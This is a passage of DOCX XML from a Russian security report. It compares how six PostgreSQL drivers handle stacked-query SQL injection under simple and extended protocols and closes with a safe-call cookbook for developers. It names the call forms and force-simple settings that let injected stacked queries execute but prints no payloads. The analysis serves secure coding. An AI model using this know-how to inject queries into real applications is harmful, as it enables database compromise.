        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5.7 Итоговая таблица: драйверы × режимы</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводка из 3.5.1–3.5.6. Колонки «Без параметров» и «С параметрами» — проходит ли stacking при типичной форме вызова API. «Force-simple» — есть ли механизм принудительно перевести даже параметризованный вызов в simple-режим. Подробности и payload-ы — в подразделах.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Драйвер</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Без параметров → стакинг</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 параметрами → стакинг</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Force-simple режим</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Особенность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psycopg2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2.9.x (≥ 2.7)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Да</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execute(sql)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> уходит как simple, исполняется всё</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 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">execute(sql, params)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> всё равно simple, защита через client-side </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">adapt()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">-экранирование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 — extended недоступен через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">execute()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Защита не от Parse, а от mogrify; только последний result в курсоре</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psycopg3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3.2.x (≥ 3.0)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Да</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execute(sql)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> text-path, оба results через </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">nextset()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 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">execute(sql, params)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> → настоящий Parse/Bind/Execute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 — нет API-переключателя</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Безопасный путь не зависит от качества экранирования: значения никогда не смешиваются с SQL</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asyncpg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0.30.x (≥ 0.18)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Да</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fetch(sql)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> без args; виден только последний result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 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">fetch(sql, *args)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> → Parse/Bind/Execute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 — нет API-переключателя</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client-side mogrify; либо args через wire, либо голый simple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pgjdbc</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42.7.x (≥ 9.4)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Да</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Statement.execute*(sql)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> всегда simple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 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PreparedStatement</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setXxx()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> → Parse/Bind/Execute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preferQueryMode=simple</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> в JDBC URL: снимает серверную защиту; защита остаётся только client-side для </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>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Два API-класса (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Statement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> vs </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PreparedStatement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">) — единственный драйвер с явным разделением</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pgx</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Нет</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — даже </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Query(ctx, sql)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> без args уходит как Parse,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отклонит сервер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 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Query(ctx, sql, args...)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> → Parse/Bind/Execute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QueryExecModeSimpleProtocol</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> per-conn или per-query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Единственный из шести: extended-default применяется к любому SQL, не только при наличии args</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node-postgres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8.13.x (≥ 7.0)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Да</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client.query(text)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> без values; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">оба results возвращаются в одном response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 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">client.query(text, [values])</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> → Parse/Bind/Execute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 — нет API-переключателя</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Template literals (`</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">... ${x} ...</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">`) — синтаксический трап: уязвимая форма короче безопасной</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтение таблицы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«Да» в «без параметров»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — конкатенация в SQL-строку без передачи отдельных values пройдёт как стакинг (исключение — pgx).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«Нет» в «с параметрами»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — параметризация через нативный API драйвера защищает от стакинга в значениях.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«Force-simple» — там, где есть</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, снимает серверную защиту: даже параметризованный запрос с конкатенацией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SQL-тексте проходит. У pgjdbc это режим для PgBouncer transaction-mode, у pgx — для legitimate multi-statement migrations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Главное наблюдение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Из шести драйверов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">pgx — единственный, у которого default-режим блокирует стакинг даже при сырой конкатенации</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. У остальных пяти защита работает только при правильной форме вызова API. Это значит, что в кросс-стек-кодбазе одна и та же ошибка («забыл передать values») имеет разные последствия: в Go-сервисе вернётся ошибка SQLSTATE 42601, в Python/Node — отработает payload.</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R20 (sources/research.md, строки 319–349)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Документация драйверов: ссылки в каждом из 3.5.1–3.5.6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Саммари категории 3.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В категории 3.5 разобрано поведение шести популярных драйверов PostgreSQL при stacked queries. Главный тезис: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">stacked queries в PG — это вопрос выбора драйвером wire-протокола, а не сервера</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Сервер всегда принимает мульти-команды в simple query и всегда отказывает в extended. Каждый драйвер решает по-своему, какой протокол использовать и при каких условиях.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3.5.1 psycopg2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — всегда simple-protocol; защита от стакинга работает через client-side </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">adapt()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-экранирование, а не через Parse/Bind. Параметризованный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">execute(sql, params)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> склеивает строку на клиенте.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3.5.2 psycopg3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — при наличии params уходит в настоящий extended; без params text-path с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nextset()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, оба results доступны при стакинге. Безопасный путь сильнее, чем у psycopg2 — значения не смешиваются с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3.5.3 asyncpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — без client-side mogrify вообще. Либо args через wire ($1) → extended, либо raw simple-protocol. Виден только последний result при стакинге.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3.5.4 pgjdbc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — два API-класса: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Statement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (всегда simple, уязвим к стакингу) и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(extended по умолчанию). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">preferQueryMode=simple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в URL снимает серверную защиту, оставляя только client-side для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-параметров.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3.5.5 pgx (Go)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — единственный из шести, у которого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">default extended</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> применяется к любому SQL, не только при наличии args. Конкатенация без args здесь блокируется сервером, чего нет у остальных пяти.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3.5.6 node-postgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — без values голый simple без экранирования; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">оба results возвращаются в одном response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> при стакинге. Template literals — синтаксический трап.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookbook: правило для разработчика по стеку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Стек</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Безопасный вызов</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Что обеспечивает защиту</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Python + psycopg2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cur.execute(sql, params)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client-side </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">adapt()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">-экранирование</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Python + psycopg3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cur.execute(sql, params)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через extended protocol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Python + asyncpg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conn.fetch(sql, *args)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$1</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через extended protocol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Java + pgjdbc</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PreparedStatement</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setXxx()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default </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">preferQueryMode=extended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Go + pgx v5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conn.Query(ctx, sql, args...)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$1</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default </w:t>
            </w:r>
